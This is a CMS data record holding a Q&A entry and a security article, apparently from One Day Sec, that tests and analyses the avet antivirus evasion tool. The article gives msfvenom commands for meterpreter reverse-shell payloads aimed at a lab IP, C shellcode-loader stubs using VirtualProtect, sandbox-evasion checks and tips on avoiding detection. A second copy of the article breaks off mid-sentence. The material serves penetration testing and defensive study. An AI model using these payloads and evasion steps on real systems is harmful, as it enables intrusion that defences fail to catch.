[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6dmHMJ5zHEA6MOHPQLZCvngnw1szu_zbSS4ggqIDO5k":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":52,"_status":50},110,"What are the different shellcode execution methods used by avet?","avet provides three core shellcode execution functions: `exec_shellcode` for standard x86 shellcode using a function pointer, `exec_shellcode_ASCIIMSF` for alphanumeric shellcode using inline assembly with EAX register, and `exec_shellcode64` for 64-bit shellcode with `VirtualProtect` to set memory permissions. Each corresponds to specific `msfvenom` payload generators, such as using `x86\u002Fxor` or `x64\u002Fxor` encoders. The flexibility allows testers to choose the appropriate method for their target environment. For more on executing .NET assemblies from memory, see [Assembly.Load exploitation analysis](\u002Fnews\u002Fanalysis-of-exploitation-techniques-for-loading-net-assemblies-from-memory-assembly-load).","\u003Cp>avet provides three core shellcode execution functions: `exec_shellcode` for standard x86 shellcode using a function pointer, `exec_shellcode_ASCIIMSF` for alphanumeric shellcode using inline assembly with EAX register, and `exec_shellcode64` for 64-bit shellcode with `VirtualProtect` to set memory permissions. Each corresponds to specific `msfvenom` payload generators, such as using `x86\u002Fxor` or `x64\u002Fxor` encoders. The flexibility allows testers to choose the appropriate method for their target environment. For more on executing .NET assemblies from memory, see [Assembly.Load exploitation analysis](\u002Fnews\u002Fanalysis-of-exploitation-techniques-for-loading-net-assemblies-from-memory-assembly-load).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fantivirus-evasion-tool-avet-testing-and-analysis\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-the-different-shellcode-execution-methods-used-by-avet-1777485134599","shellcode execution, msfvenom, VirtualProtect, inline assembly",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},28,"AntiVirus Evasion Tool (avet) Testing and Analysis","antivirus-evasion-tool-avet-testing-and-analysis","Comprehensive testing and analysis of AVET, an antivirus evasion tool from BlackHat Arsenal. Learn setup, usage, and evasion techniques.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>avet is a tool designed to bypass antivirus detection, employing various anti-virus evasion techniques.\u003C\u002Fp>\u003Cp>It has been selected for blackhat ASIA 2017 arsenal, blackhat USA 2017 arsenal, and blackhat USA 2018 arsenal:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blackhat.com\u002Fasia-17\u002Farsenal.html#avet-antivirus-evasion-tool\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blackhat.com\u002Fus-17\u002Farsenal\u002Fschedule\u002Findex.html#avet---antivirus-evasion-tool-7908\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blackhat.com\u002Fus-18\u002Farsenal\u002Fschedule\u002Findex.html#avet-antivirus-evasion-tool-10692\u003C\u002Fp>\u003Cp>GitHub open-source repository:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgovolution\u002Favet\u003C\u002Fp>\u003Cp>This article will test it and analyze the anti-virus evasion techniques used by avet based on personal experience.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Environment Setup\u003C\u002Fli>\u003Cli>Usage Process\u003C\u002Fli>\u003Cli>Tool Implementation Details\u003C\u002Fli>\u003Cli>Technical Details Analysis\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Environment Setup\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test System: kali2 x64\u003C\u002Fp>\u003Ch3>1. Download\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgovolution\u002Favet\u003C\u002Fp>\u003Ch3>2. Compile\u003C\u002Fh3>\u003Cp>If using 32-bit Kali system, compilation is required\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gcc -o make_avet make_avet.c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>64-bit Kali system does not require this\u003C\u002Fp>\u003Ch3>3. Install wine32\u003C\u002Fh3>\u003Cp>Otherwise, cannot generate exe\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019793280_0_9e05784170.jpeg\">\u003C\u002Fp>\u003Cp>Installation command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dpkg --add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Install TDM GCC\u003C\u002Fh3>\u003Cp>Reference address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgovolution.wordpress.com\u002F2017\u002F02\u002F04\u002Fusing-tdm-gcc-with-kali-2\u002F\u003C\u002Fp>\u003Cp>Download:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsourceforge.net\u002Fprojects\u002Ftdm-gcc\u002F\u003C\u002Fp>\u003Cp>Install:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wine tdm64-gcc-5.1.0-2.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The installation window pops up, select Create\u003C\u002Fp>\u003Cp>Select MinGW-w64\u002FTDM64 (32-bit and 64-bit)\u003C\u002Fp>\u003Cp>Next, choose the default settings for all options, and finally install\u003C\u002Fp>\u003Ch3>5. Test\u003C\u002Fh3>\u003Cp>Execute:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fmake_avet -h\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Get parameter description\u003C\u002Fp>\u003Ch2>0x03 Usage Process\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Execute avet_fabric.py\u003C\u002Fh3>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019801432_1_228028c2e8.jpeg\">\u003C\u002Fp>\u003Ch3>2. Select script\u003C\u002Fh3>\u003Cp>Here choose 7: build_win64_meterpreter_rev_tcp_xor.sh\u003C\u002Fp>\u003Ch3>3. Edit script content\u003C\u002Fh3>\u003Cp>Display default script content, which can be modified as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019817309_2_66a12a5ed5.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The script content corresponds to the file \u002Fbuild\u002Fbuild_win64_meterpreter_rev_tcp_xor.sh\u003C\u002Fp>\u003Cp>Default script content and description are as follows:\u003C\u002Fp>\u003Cp>(1) Specify GCC compilation settings, content as win64_compiler=\"wine gcc -m64\"\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>. build\u002Fglobal_win64.sh\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Use meterpreter to generate a reverse payload and save it as sc.txt\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f c --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Read the content of sc.txt, extract the shellcode, and delete the file sc.txt\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fformat.sh sc.txt &gt; scclean.txt &amp;&amp; rm sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(4) Call make_avet, passing the shellcode and function flags to the file defs.h\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fmake_avet -f scclean.txt -X -E\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(5) Use GCC to compile avet.c (which calls defs.h), generating the final file pwn.exe\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$win64_compiler -o pwn.exe avet.c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(6) Delete the file scclean.txt and clear the file defs.h\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rm scclean.txt &amp;&amp; echo \"\" &gt; defs.h\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Execute to generate the final file\u003C\u002Fh3>\u003Cp>After confirming the script content, press Enter to execute the script, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019828134_3_898bea842c.jpeg\">\u003C\u002Fp>\u003Cp>Generate final file pwn.exe\u003C\u002Fp>\u003Ch2>0x04 Tool Implementation Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Generate payload via meterpreter and save file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f hex --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>File content as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019839099_4_74f80c3b51.jpeg\">\u003C\u002Fp>\u003Ch3>2. Run format.sh to extract shellcode from previous file\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fformat.sh sc.txt &gt; scclean.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Extracted file content as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019860413_5_373eb0f5e1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Personally, I believe the above two steps can be achieved with one command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f hex --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Run make_avet to extract shellcode from previous file, set feature flags, and write to file defs.h\u003C\u002Fh3>\u003Cp>The function flags correspond to the various features supported by make_avet; detailed explanations can be obtained by executing .\u002Fmake_avet -h.\u003C\u002Fp>\u003Cp>The specific functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Read shellcode from a specified file and execute it.\u003C\u002Fli>\u003Cli>Read encrypted shellcode from a specified file, decrypt it, and then execute.\u003C\u002Fli>\u003Cli>Call iexplore.exe to access a specified URL, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Use WinAPI socket calls to access port 80 of a specified URL, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Download a file via certutil, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Download a file via PowerShell, retrieve shellcode, and execute it.\u003C\u002Fli>\u003Cli>Use WinAPI fopen to bypass sandbox detection.\u003C\u002Fli>\u003Cli>Use WinAPI gethostbyname to bypass sandbox detection.\u003C\u002Fli>\u003Cli>Compile into a 64-bit executable.\u003C\u002Fli>\u003Cli>Hide the program window.\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>4. Use gcc to compile avet.c, generating the final file.\u003C\u002Fh3>\u003Cp>avet.c is the main program, reading shellcode and function flags from the header file defs.h.\u003C\u002Fp>\u003Ch2>0x05 Technical Details Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Core code for executing shellcode\u003C\u002Fh3>\u003Cp>(1)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\tint (*funct)();\u003Cbr>\tfunct = (int (*)()) shellcode;\u003Cbr>\t(int)(*funct)();\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameters for generating corresponding shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x86\u002Fxor -f hex -a x86 --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode_ASCIIMSF(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\tregister unsigned char* r asm(\"eax\");\u003Cbr>\\tr=shellcode;\u003Cbr>\\tasm(\"call *%eax;\");\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameters for generating shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x86\u002Falpha_mixed -f hex -a x86 --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode64(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\\tint len=strlen(shellcode);\u003Cbr>\\tDWORD l=0;\u003Cbr>\\tVirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&amp;l);\u003Cbr>\\t(* (int(*)()) shellcode)();\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameters for generating shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f hex --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The encryption method for shellcode can also choose shikata_ga_nai. The parameters for using shikata_ga_nai encryption for 50 rounds are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.2.103 lport=443 -e x86\u002Fshikata_ga_nai -i 50 -f hex -a x86 --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Supplement\u003C\u002Fstrong>：\u003C\u002Fp>\u003Cp>The method of executing shellcode is not unique; here is another example code for executing shellcode:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>void exec_shellcode(unsigned char *shellcode)\u003Cbr>{\u003Cbr>\t((void(*)(void))&amp;shellcode)();\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The method of generating shellcode is also not unique; you can generate shellcode according to your own ideas.\u003C\u002Fp>\u003Ch3>2、Self-implemented encryption and decryption algorithms\u003C\u002Fh3>\u003Cp>The corresponding parameter for encryption is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fmake_avet -E\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The corresponding code for decryption is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>unsigned char* decode_shellcode(unsigned char *buffer, unsigned char *shellcode, int size)\u003Cbr>{\u003Cbr>\tint j=0;\u003Cbr>\tshellcode=malloc((size\u002F2));\u003Cbr>\tint i=0;\u003Cbr>\tdo\u003Cbr>\t{\u003Cbr>\t\tunsigned char temp[3]={0};\u003Cbr>\t\tsprintf((char*)temp,\"%c%c\",buffer[i],buffer[i+1]);\u003Cbr>\t\tshellcode[j] = strtoul(temp, NULL, 16);\u003Cbr>\t\ti+=2;\u003Cbr>\t\tj++;\u003Cbr>\t} while(i\u003Csize);\u003Cbr>\treturn shellcode;\u003Cbr>}\u003C\u002Fsize);\u003Cbr>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Sandbox Evasion\u003C\u002Fh3>\u003Ch4>(1) Using WinAPI fopen\u003C\u002Fh4>\u003Cp>Save shellcode in file c:\\windows\\system.ini\u003C\u002Fp>\u003Cp>Read file c:\\windows\\system.ini during main program execution\u003C\u002Fp>\u003Cp>If in sandbox, unable to open file c:\\windows\\system.ini, main program automatically exits\u003C\u002Fp>\u003Cp>Key code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>FILE *fp = fopen(\"c:\\\\windows\\\\system.ini\", \"rb\");\u003Cbr>if (fp == NULL)\u003Cbr>\treturn 0;\u003Cbr>fclose(fp);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Using WinAPI gethostbyname\u003C\u002Fh4>\u003Cp>Main program calls WinAPI gethostbyname to obtain host information for specified hostname\u003C\u002Fp>\u003Cp>If in sandbox, gethostbyname will return NULL, main program automatically exits\u003C\u002Fp>\u003Cp>Key code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>struct hostent *hp = gethostbyname(KVALUE);\u003Cbr>if (hp != NULL) \t\t\u003Cbr>\texit(0);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Methods for detecting sandbox conditions are not unique; examples include system process information, configuration information, device information, etc.\u003C\u002Fp>\u003Ch3>4. Supports remote execution via psexec\u003C\u002Fh3>\u003Cp>The main program is replaced with avetsvc.c\u003C\u002Fp>\u003Cp>Compared to avet.c, avetsvc.c adds service registration functionality, enabling remote startup via psexec as a service\u003C\u002Fp>\u003Ch2>0x06 Evasion Effectiveness\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Specific evasion effectiveness details omitted\u003C\u002Fp>\u003Cp>If detected, you can try the following methods:\u003C\u002Fp>\u003Cul>\u003Cli>Modify the shellcode\u003C\u002Fli>\u003Cli>Encrypt the shellcode\u003C\u002Fli>\u003Cli>Change the shellcode loading method\u003C\u002Fli>\u003Cli>Use a trusted program with a digital signature to launch the shellcode\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article conducts practical testing on avet, analyzing its technical details while omitting the actual antivirus evasion effectiveness.\u003C\u002Fp>\u003Cp>Overall, avet implements a complete framework, making it easy to perform secondary development on this basis, which indeed can enhance the efficiency of penetration testers.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>avet is a tool designed to bypass antivirus detection, employing various anti-virus evasion techniques.\u003C\u002Fp>\u003Cp>It has been selected for blackhat ASIA 2017 arsenal, blackhat USA 2017 arsenal, and blackhat USA 2018 arsenal:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blackhat.com\u002Fasia-17\u002Farsenal.html#avet-antivirus-evasion-tool\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blackhat.com\u002Fus-17\u002Farsenal\u002Fschedule\u002Findex.html#avet---antivirus-evasion-tool-7908\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.blackhat.com\u002Fus-18\u002Farsenal\u002Fschedule\u002Findex.html#avet-antivirus-evasion-tool-10692\u003C\u002Fp>\u003Cp>GitHub open-source repository:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgovolution\u002Favet\u003C\u002Fp>\u003Cp>This article will test it and analyze the anti-virus evasion techniques used by avet based on personal experience.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Environment Setup\u003C\u002Fli>\u003Cli>Usage Process\u003C\u002Fli>\u003Cli>Tool Implementation Details\u003C\u002Fli>\u003Cli>Technical Details Analysis\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Environment Setup\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test System: kali2 x64\u003C\u002Fp>\u003Ch3>1. Download\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgovolution\u002Favet\u003C\u002Fp>\u003Ch3>2. Compile\u003C\u002Fh3>\u003Cp>If using 32-bit Kali system, compilation is required\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gcc -o make_avet make_avet.c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>64-bit Kali system does not require this\u003C\u002Fp>\u003Ch3>3. Install wine32\u003C\u002Fh3>\u003Cp>Otherwise, cannot generate exe\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019793280_0_9e05784170-1.jpeg\">\u003C\u002Fp>\u003Cp>Installation command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>dpkg --add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Install TDM GCC\u003C\u002Fh3>\u003Cp>Reference address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgovolution.wordpress.com\u002F2017\u002F02\u002F04\u002Fusing-tdm-gcc-with-kali-2\u002F\u003C\u002Fp>\u003Cp>Download:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsourceforge.net\u002Fprojects\u002Ftdm-gcc\u002F\u003C\u002Fp>\u003Cp>Install:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wine tdm64-gcc-5.1.0-2.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The installation window pops up, select Create\u003C\u002Fp>\u003Cp>Select MinGW-w64\u002FTDM64 (32-bit and 64-bit)\u003C\u002Fp>\u003Cp>Next, choose the default settings for all options, and finally install\u003C\u002Fp>\u003Ch3>5. Test\u003C\u002Fh3>\u003Cp>Execute:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fmake_avet -h\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Get parameter description\u003C\u002Fp>\u003Ch2>0x03 Usage Process\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Execute avet_fabric.py\u003C\u002Fh3>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019801432_1_228028c2e8-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Select script\u003C\u002Fh3>\u003Cp>Here choose 7: build_win64_meterpreter_rev_tcp_xor.sh\u003C\u002Fp>\u003Ch3>3. Edit script content\u003C\u002Fh3>\u003Cp>Display default script content, which can be modified as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019817309_2_66a12a5ed5-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The script content corresponds to the file \u002Fbuild\u002Fbuild_win64_meterpreter_rev_tcp_xor.sh\u003C\u002Fp>\u003Cp>Default script content and description are as follows:\u003C\u002Fp>\u003Cp>(1) Specify GCC compilation settings, content as win64_compiler=\"wine gcc -m64\"\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>. build\u002Fglobal_win64.sh\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Use meterpreter to generate a reverse payload and save it as sc.txt\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>msfvenom -p windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.116.142 lport=443 -e x64\u002Fxor -f c --platform Windows &gt; sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Read the content of sc.txt, extract the shellcode, and delete the file sc.txt\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fformat.sh sc.txt &gt; scclean.txt &amp;&amp; rm sc.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(4) Call make_avet, passing the shellcode and function flags to the file defs.h\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>.\u002Fmake_avet -f scclean.txt -X -E\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(5) Use GCC to compile avet.c (which calls defs.h), generating the final file pwn.exe\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$win64_compiler -o pwn.exe avet.c\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(6) Delete the file scclean.txt and clear the file defs.h\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rm scclean.txt &amp;&amp; echo \"\" &gt; defs.h\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>4. Execute to generate the final file\u003C\u002Fh3>\u003Cp>After confirming the script content, press Enter to execute the script, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019828134_3_898bea842c-1.jpeg\">\u003C\u002Fp>\u003Cp>Generate final file pwn.exe\u003C\u002Fp>\u003Ch2>0x04 Tool Implementation Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Generate payload via meterpreter and save 